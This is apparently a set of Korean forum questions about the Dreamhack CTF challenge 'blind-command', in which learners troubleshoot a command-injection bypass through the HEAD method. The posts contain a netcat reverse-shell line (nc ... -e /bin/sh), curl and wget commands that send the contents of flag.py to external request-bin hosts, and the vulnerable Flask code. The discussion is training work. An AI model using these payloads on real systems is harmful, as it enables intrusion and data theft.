blind-command

안녕하세요 문제는 풀었는데 nc명령어가 제대로 작동하지 않아 질문드립니다 로컬 서버에서 nc -lvp 4000을 통해 포트를 열어놓고 문제상에서 nc [myIP] 4000 -e /bin/sh 명령어를 통해 쉘을 전달할려 했는데 로컬 서버에서 답이 안옵니다.... 예전에 다른 문제 풀때도 이랬던 적이 있는것 같아서 방화벽도 꺼봤는데 안되더라구요 혹시 nc명령어가 작동안되는 이유나 해결법 아시는분 답변 부탁드립니다....ㅠㅠ

목표로 하는 서버에 직접 head 요청을 보내면 body 값을 반환하지 않기에 그 내용이 보이지 않는것은 이해가 갑니다. 하지만 왜 외부의 서버를 하나 마련해서 거기로 결과값을 받고 출력하게 하면 body값이 보이는지가 궁금합니다. 즉 host3.dreamhack.games:12345 로 직접 head 요청을 하면 body값이 반환되지 않지만 abcde.request.dreamhack.games라는 결과값을 받을 서버를 준비하고 거기로 curl 명령어를 사용하면 왜 body 값이 출력되는지가 궁금합니다.

해당 문제에서 원격 서버로 GET 요청을 보내면서 쿼리 파라미터에 cat flag.py의 결과를 전달해주려고 했는데, cat flag.py의 결과에 공백이 존재하여, ""로 감싸야합니다. curl https://offxuuz.request.dreamhack.games/?query="$(cat+flag.py)" 따라서, 위와 같은 시스템 명령어를 수행하기 위해 아래와 같은 페이로드를 작성하여 Burp Suite를 통해 보냈는데, ""로 감싸면 GET 요청 자체가 보내지지 않습니다. HEAD /?cmd=curl+https://offxuuz.request.dreamhack.games/?query="$(cat+flag.py)" HTTP/1.1 뭔가 쿼리 파라미터에 ""가 추가된 부분 때문에 문제가 생기는 것 때문인가 해서 %22로 URL 인코딩을 해도 결과는 똑같았습니다. ""로 감싸주지 않고 아래와 같이 페이로드를 보내면 GET 요청은 잘 가지만 FLAG = DH~에서 FLAG만 출력되서 플래그를 확인할 수 없는데, HEAD /?cmd=curl+https://offxuuz.request.dreamhack.games/?query=$(cat+flag.py) HTTP/1.1 왜 POST 요청과 달리 GET 요청에서는 ""로 감싸면 GET 요청 자체가 원격 서버로 전달되지 않는것일까요? 참고로, wget을 통해 GET 요청을 보냈을 대는 ""로 감싸도 페이로드가 잘 전달되어 원격 서버로 플래그 전체가 전달되었습니다. 읽어주셔서 감사합니다.

nc를 써보든 curl을 써보든 메소드 우회해서 입력하는데 반응이 안오네요.. 똑같이 직접 서버 실행해서 해보면 잘되는데 왜 이럴까요? 힌트라도 주시면 감사하겠습니다.

서버에서 실행하는 system 명령어(os.system(cmd))에 대한 결과를 확인하기 위해 curl과 python을 이용하여 두개의 요청을 보냈습니다! 그런데 python으로 한 요청의 결과 값이 오지 않는 이유를 모르겠습니다... S_METHOD에는 GET 메소드 대신 사용할 메소드가 들어갔습니다. cmd1을 통한 요청의 응답은 오지 않았고, cmd2를 통한 요청은 응답이 왔습니다 import requests import os link = "https://vmtpmuf.request.dreamhack.games" cmd1 = f"python -c 'import requests; requests.get(\"{link}\")'" cmd2 = "curl -v 'https://vmtpmuf.request.dreamhack.games'" if name == "main": chall_port = int(sys.argv[1]) chall_url = f"http://host1.dreamhack.games:{chall_port}/?cmd={cmd}" #print(cmd) #print(chall_url) #os.system(cmd) response = requests.S_METHOD(chall_url) `

윈도우용 nc 받아서 -l -p 1234로 서버 띄우고 파일 내용은 일단 접어두고 응답 오는지 보려고 하는데 답이 안오네요. 공유기에서 포트포워딩 설정도 했고 메소드는 head부터 다 날려봤습니다. 답이 없으니 답답하네요. 그러니 blind-command겠습니다만. 그리고 드림핵 툴즈 서비스를 이용하면 쉽다는 말씀도 있던데 사용법 같은 게 있을까요? 하수를 위해 조언부탁드립니다.

@app.route('/' , methods=['GET']) def index(): cmd = request.args.get('cmd', '') if not cmd: return "?cmd=[cmd]" if request.method == 'GET': '' else: os.system(cmd) return cmd app.run(host='0.0.0.0', port=8000) Flask를 잘몰라서 일단 파이썬으로 올려서 else 라인만 주석처리하면 잘되는데... GET으로 받게 설정해논거같은데 GET으로 받음 '' ????

답을 풀고 나니 너무 많은 힌트를 유출한것 같아서 질문을 삭제했습니다. 일단은 강의 내용중 실행 결과를 확인할 수 없는 환경 을 잘 보시고 그걸 적용하기 전에는 어떤 방식으로 적용해야 할지는 다른 질문들을 참고하시면 되겠습니다. 헐~ 평소 잘 사용 안하는 것들이라서 어려웠는데, 풀고나니... 그리 어렵지 않네요. ㅎㅎㅎ

host1.dreamhack.games:23376으로 접속을 했는데 ?cmd=[cmd]이렇게만 뜨는데 이게 맞나요?

코드를 확인하니 GET 메소드 사용을 제한하고 있고 사용 가능한 메소드가 GET, HEAD, OPTIONS 이렇게 3가지인데 HEAD 메소드가 GET 메소드랑 기능이 거의 동일하다고 해서 GET 메소드 부분을 HEAD로 조작하고 패킷을 보냈는데도 해결이 안 됩니다.